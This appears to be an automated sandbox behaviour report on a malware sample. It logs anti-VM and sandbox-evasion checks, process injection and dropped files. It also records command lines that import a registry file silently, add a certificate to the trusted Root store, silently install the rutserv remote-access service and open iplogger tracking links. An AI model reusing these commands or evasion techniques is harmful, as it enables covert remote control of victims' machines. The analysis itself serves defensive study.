Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\regedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1wOdXavtlE.exe PID: 6844, type: MEMORY

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Show sources

Source: C:\ProgramData\Immunity\rutserv.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, ssevs.exe, 00000016.00000002.492325113.000000000367A000.00000004.00000001.sdmp, sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, ssevs.exe, 00000016.00000002.492325113.000000000367A000.00000004.00000001.sdmp, sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Window / User API: threadDelayed 1968
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Window / User API: threadDelayed 6807
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Window / User API: threadDelayed 761

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Dropped PE file which has not been started: C:\ProgramData\is-PFD3D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\ProgramData\Immunity\is-1J28N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\ProgramData\Immunity\is-2SOD7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\ProgramData\Immunity\is-02I40.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6848	Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6436	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 660	Thread sleep time: -270000s >= -30000s
Source: C:\Windows\System32\conhost.exe TID: 2268	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 6440	Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 5628	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe TID: 3500	Thread sleep count: 173 > 30
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe TID: 5236	Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe TID: 5308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 956	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 6768	Thread sleep count: 71 > 30
Source: C:\Windows\System32\svchost.exe TID: 6272	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040B268 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040AC9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005E9B24 FindFirstFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040CBFC FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040C630 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_00641778 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_004A1628 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 31500
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 31500
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Thread delayed: delay time: 31500
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477

Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: svchost.exe, 0000000F.00000002.464247410.00000221A32A5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Process information queried: ProcessInformation

Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe

Code function: 23_2_00007FF7D9F52C98 GetCurrentThreadId,memset,IsDebuggerPresent,OutputDebugStringW,

Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe

Code function: 23_2_00007FF7D9F53D48 GetCurrentProcessId,CreateMutexExW,CloseHandle,WaitForSingleObjectEx,ReleaseMutex,WaitForSingleObjectEx,GetLastError,CloseHandle,SetLastError,GetLastError,CloseHandle,SetLastError,GetLastError,ReleaseMutex,SetLastError,GetProcessHeap,HeapFree,ReleaseMutex,

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process token adjusted: Debug
Source: C:\ProgramData\Immunity\rutserv.exe	Process token adjusted: Debug

Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_64882991 SetUnhandledExceptionFilter,
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_648815C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_648891FC GetCurrentProcessId,SetUnhandledExceptionFilter,Sleep,
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_00007FF7D9F54A60 SetUnhandledExceptionFilter,
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_00007FF7D9F54D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected

Show sources

Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\System32\uxtheme.dll
Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\System32\uxtheme.dll
Source: C:\Windows\regedit.exe	Section loaded: C:\Windows\System32\uxtheme.dll
Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\System32\uxtheme.dll

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Memory written: C:\Users\user\AppData\Local\Temp\ssevs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Memory written: C:\Users\user\AppData\Local\Temp\sssevs.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_0062F168 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_005A502C InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_005A41D0 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_00405AC0 cpuid

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: GetLocaleInfoW,

Source: C:\ProgramData\Immunity\rutserv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\ProgramData\Immunity\rutserv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Users\user\Desktop\1wOdXavtlE.exe VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
